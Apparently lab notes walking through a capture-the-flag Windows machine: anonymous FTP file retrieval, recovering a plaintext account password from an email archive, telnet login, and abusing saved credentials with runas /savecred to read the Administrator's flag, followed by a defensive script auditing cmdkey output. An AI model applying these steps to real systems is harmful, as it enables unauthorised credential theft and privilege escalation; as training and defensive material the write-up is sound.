RunAs

Allows us to run a command as somebody else.

Looking for this command (stored credentials on a machine):

cmdkey /list

Access Machine:

ftp:

ftp 10.10.10.98
anonymous
anonymous

Switch FTP from ASCII to Binary:

binary

Commands to run on FTP:

recurse on #no idea what this does
cd backups
ls
get backup.mdb
cd ..
cd engineer
ls
get "Access Control.zip" #this won't work without double quotes because of the space

These files are in the Downloads folder (I found them in ~ on Kali, not Downloads).

A PST file is an Outlook email archive.

  • Read with readpst
readpst "access control.pst"

An mdb file is a Microsoft Access database.

  • Read with mdb-sql
mdb-sql backup.mdb

NOTE: Just copy them over to Windows and open them with Microsoft stuff

The database had the password for the zip in the “auth” table.

Email:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John

New user:

security:4Cc3ssC0ntr0ller

Telnet into machine with the new user:

telnet -l security 10.10.10.98
4Cc3ssC0ntr0ller

From here, we can enumerate with automated tools like winPEAS or PowerShell.

We can go browse around to see what’s on the computer

To check stored credentials on a machine:

cmdkey /list

result: (screenshot of the cmdkey /list output; image not included here)

We can use RunAs (built-in) with the saved credential to copy a file’s content (using TYPE and redirecting the output to a txt) from the admin folder to our user folder:

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE c:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt"

RunAs is kinda like Sudo
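The security-relevant point in these notes is that a "Domain Password" credential saved for an administrator account is enough for any local user to run commands as that account via runas /savecred. As an added example (not part of the original notes and not a Microsoft tool), the following Python parses cmdkey /list output and flags saved credentials for privileged accounts, so a defender can audit a fleet of hosts for this exposure. The sample output and the list of privileged account names are constructed assumptions; tune the names to your environment.

```python
"""Audit `cmdkey /list` output for saved credentials that runas /savecred could use.

Added example for these notes; the sample text below is constructed, not captured
from the page's machine, and the privileged-name list is an assumption.
"""

# Constructed sample of `cmdkey /list` output (two stored credentials).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: build-svc
    Local machine persistence
"""

# Assumption: account names (without the domain prefix) that count as privileged.
PRIVILEGED_NAMES = {"administrator", "admin"}


def parse_cmdkey_list(text):
    """Split cmdkey /list output into one dict per stored credential.

    Each credential block starts with a 'Target:' line, followed by 'Type:' and
    'User:' lines and an optional persistence line such as 'Local machine persistence'.
    """
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            current = {"target": line.split(":", 1)[1].strip(),
                       "type": "", "user": "", "persistence": ""}
            entries.append(current)
        elif current is None:
            continue  # header lines before the first credential
        elif line.startswith("Type:"):
            current["type"] = line.split(":", 1)[1].strip()
        elif line.startswith("User:"):
            current["user"] = line.split(":", 1)[1].strip()
        elif line:
            current["persistence"] = line  # any other non-empty line is a persistence note
    return entries


def find_risky(entries, privileged=PRIVILEGED_NAMES):
    """Return stored credentials that runas /savecred could consume for a privileged account.

    runas /savecred uses 'Domain Password' credentials, so Generic entries are ignored.
    """
    risky = []
    for entry in entries:
        account = entry["user"].split("\\")[-1].lower()  # strip DOMAIN\ prefix
        if entry["type"].lower() == "domain password" and account in privileged:
            risky.append(entry)
    return risky


if __name__ == "__main__":
    for hit in find_risky(parse_cmdkey_list(SAMPLE_CMDKEY_OUTPUT)):
        print(f"RISK: saved credential for {hit['user']} (target {hit['target']})")
```

On a real host you would feed the script the output of cmdkey /list for each interactive user's profile, since the credential store is per user. Any hit should be removed with cmdkey /delete:<target> (a real cmdkey option) and, where the business does not need saved credentials, prevented outright with the "Network access: Do not allow storage of passwords and credentials for network authentication" security policy.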